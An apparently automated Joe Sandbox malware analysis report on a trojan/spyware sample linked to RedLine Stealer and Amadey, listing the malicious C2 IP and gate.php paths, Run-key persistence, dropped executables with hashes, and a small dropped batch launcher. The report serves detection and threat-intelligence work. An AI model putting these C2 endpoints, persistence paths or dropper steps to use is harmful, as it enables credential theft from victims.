                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://tempuri.org/Entity/Id7ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000032DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoDB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.000000000421B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://tempuri.org/Entity/Id4ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2002/12/policyDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://tempuri.org/Entity/Id22ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, DB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://tempuri.org/Entity/Id22ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://tempuri.org/Entity/Id16ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003396000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/IssueDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://tempuri.org/Entity/Id19ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://tempuri.org/Entity/Id18ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.openssl.org/Hlibcrypto-1_1.dll.20.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://tempuri.org/Entity/Id3ResponseDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://schemas.datacontract.org/2004/07/System.ServiceModelDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://schemas.xmlsoap.org/soap/actor/nextDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000031E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://tempuri.org/Entity/Id14ResponseDDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.00000000033DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryDB9C.tmp.ssg.exe, 0000000A.00000002.2449706358.000000000327A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    185.81.68.147
                                                                                                                                                                                                                    		unknownFinland
                                                                                                                                                                                                                    		50108KLNOPT-ASFItrue

                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                    Analysis ID:1575318
                                                                                                                                                                                                                    Start date and time:2024-12-15 09:11:06 +01:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 9m 56s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Number of analysed new started processes analysed:22
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:1
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:K6qneGSDSB.exe
                                                                                                                                                                                                                    renamed because original name is a hash value
                                                                                                                                                                                                                    Original Sample Name:52c82f6ceb8cf41de8a4c01b313e3712.exe
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@36/60@0/1
                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                    • Successful, ratio: 65%
                                                                                                                                                                                                                    • Number of executed functions: 190
                                                                                                                                                                                                                    • Number of non-executed functions: 279
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                    • VT rate limit hit for: K6qneGSDSB.exe

                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                    03:11:57API Interceptor4949x Sleep call for process: msiexec.exe modified
                                                                                                                                                                                                                    03:11:57API Interceptor4949x Sleep call for process: audiodg.exe modified
                                                                                                                                                                                                                    03:11:57API Interceptor237428x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                    03:12:22API Interceptor82x Sleep call for process: DB9C.tmp.ssg.exe modified
                                                                                                                                                                                                                    09:12:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe
                                                                                                                                                                                                                    09:12:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exe

                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    185.81.68.147file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                    • 185.81.68.147/tizhyf/gate.php?232B06DEE822786254513
                                                                                                                                                                                                                    mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                    • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                                    D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                    • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                                    D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                    • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                                    hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                    • 185.81.68.147/7vhfjke3/index.php?wal=1
                                                                                                                                                                                                                    tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                    • 185.81.68.147/7vhfjke3/index.php
                                                                                                                                                                                                                    yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                    • 185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
                                                                                                                                                                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                    • 185.81.68.147/tizhyf/gate.php?0CD020845398340779059
                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                                                    • 185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510

                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    KLNOPT-ASFIfile.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                    • 185.81.68.147
                                                                                                                                                                                                                    mggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                    • 185.81.68.148
                                                                                                                                                                                                                    D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                    • 185.81.68.148
                                                                                                                                                                                                                    D72j5I83wU.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                    • 185.81.68.148
                                                                                                                                                                                                                    hoPazBDFG9.dllGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                    • 185.81.68.148
                                                                                                                                                                                                                    tOuVwTJrau.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                    • 185.81.68.148
                                                                                                                                                                                                                    eHCgK6fZc2.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                    • 185.81.68.147
                                                                                                                                                                                                                    yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                    • 185.81.68.148
                                                                                                                                                                                                                    file.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                    • 185.81.68.147
                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                                                    • 185.81.68.147

                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exemggoBrtk9t.exeGet hashmaliciousAmadey, RedLineBrowse
                                                                                                                                                                                                                      yINR7uQlPr.exeGet hashmaliciousAmadey, RedLineBrowse

                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DB9C.tmp.ssg.exe.log

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3293
                                                                                                                                                                                                                        Entropy (8bit):5.3364558769830905
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc5q35VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                        MD5:4ED743F7E1676539C322DAB36E328377
                                                                                                                                                                                                                        SHA1:AAD5F8C6DF7C8CEC18522B9E572721A71F5182F3
                                                                                                                                                                                                                        SHA-256:EBEEE88F4A11C2DB02A1AC83F7CF00BEADB70CF23670DA29487B6543A1EDCB00
                                                                                                                                                                                                                        SHA-512:024E50C28044329DCEB38B02C7874F7FDB43FB84156E5C32ED8966F0682FFBA48A159D2DE96ADE52C33B5D3364612A9D1E16714B00944C18CD82D60F4479CADF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1022
                                                                                                                                                                                                                        Entropy (8bit):5.252542495586483
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
                                                                                                                                                                                                                        MD5:2F99BED9FF8C41AFEE96B028ED8B86A2
                                                                                                                                                                                                                        SHA1:BF4E91361EE28C5506E812F2BF8C3495676097B0
                                                                                                                                                                                                                        SHA-256:F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
                                                                                                                                                                                                                        SHA-512:834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\12DB.tmp.update.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):309760
                                                                                                                                                                                                                        Entropy (8bit):6.298481352377728
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:CJqAvoYumbeaLVA/HmH6iWmZx/M+VK0lA/OBYJ0tYRVxG2PTY:3AvoYumb9VA/m9WmZxlVK0lAZ/PTY
                                                                                                                                                                                                                        MD5:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                        SHA1:226A6FBD66992A0F2DDBF5D7572FAB2CF8F5001E
                                                                                                                                                                                                                        SHA-256:4A55DA3C91388A8EA539FC750B52DD90AF5D2F33F2E7269A73C2146243ED24CD
                                                                                                                                                                                                                        SHA-512:9174BD1C379ED76BE342400949A1E431A6430297485FD9C48ED12C60E7DE94817B75D645C4EBB17B3A79D66BA813C40C36527F912E927A8EC27E4668D9C09DD8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A..A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d....r^g.........."......:...4.......4.........@..........................................@.................................................pr..(.......(.......L....................................................................P..X............................text....8.......:.................. ..`.rdata...#...P...$...>..............@..@.data...............................@....pdata..L............b..............@..@.rsrc...(............f..............@..@.x64.....P.......P...j..................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5915958
                                                                                                                                                                                                                        Entropy (8bit):7.9860937778360945
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:98304:ce0q2B/JWHioVQWJuhswoYv5eO0zo0Ahd6y0Naxxv8fqDDAx06btVUJFaeu8+qBC:cp0HiouWJysVYvsOaoyMxxvjDDAx0aec
                                                                                                                                                                                                                        MD5:B40682DDC13C95E3C0228D09A3B6AAE2
                                                                                                                                                                                                                        SHA1:FFBAC13D000872DBF5A0BCE2B6ADDF5315E59532
                                                                                                                                                                                                                        SHA-256:F40224CA24A6D189791058779EB4C9BAB224CAA58B00BD787B1FF981D285D5A4
                                                                                                                                                                                                                        SHA-512:B186331B49E7821466FD003980F9CA57F5BCF41574C1D1893B8949D8A944FFE67F06D8A67D4BFDF4599FCD4F3282C36BED1FC8585E1F8DD541E8FDF121F48EEB
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d.....]g.........."....(.....X.................@.....................................aZ...`.................................................l...x............`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Grabber.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                        Entropy (8bit):4.391379540616391
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:NNgr+jdLXW5QVBNVKdLXW5WGACovn:Nu+hLXW6B4LXW2vn
                                                                                                                                                                                                                        MD5:B3367D004A5EFA2C859EC672A5FED667
                                                                                                                                                                                                                        SHA1:E6E66E075F078ACBB4D82F8C5B3F9A65BA9B00FD
                                                                                                                                                                                                                        SHA-256:56BC5E6EEFDC679A26DF1223EFAD6C98B755EDB6C707EF7E5940262AC6EC76CC
                                                                                                                                                                                                                        SHA-512:22A4E92E6E7241FC28C5B8554B0EF435774BB6D12CEB20CDC2207FDFEE2E7CA12B649B57C2407B5519D01A95A7DA60AD0DF2D828F0838E19C46B2F798BF3C7F1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@shift /0..start configs\update.exe..start configs\svchost.exe..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):307712
                                                                                                                                                                                                                        Entropy (8bit):5.081279904923014
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:acZqf7D34kp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzy3RMeqiOL2bBOA:acZqf7DIcnGCQNB1fA0GTV8kU0L
                                                                                                                                                                                                                        MD5:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                                        SHA1:92EF2FD33F713D72207209EC65F0DE6EEF395AF5
                                                                                                                                                                                                                        SHA-256:94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
                                                                                                                                                                                                                        SHA-512:AE2D10F9895E5F2AF10B4FA87CDB7C930A531E910B55CD752B15DAC77A432CC28ECA6E5B32B95EEB21E238AAF2EB57E29474660CAE93E734D0B6543C1D462ACE
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: mggoBrtk9t.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: yINR7uQlPr.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI54762\VCRUNTIME140.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):89752
                                                                                                                                                                                                                        Entropy (8bit):6.5021374229557996
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:EFmmAQ77IPzHql9a2k+2v866Xc/0i+N1WtYil42TZiCvecbtjawN+o/J:EQmI+NnXertP42xvecbtjd+ox
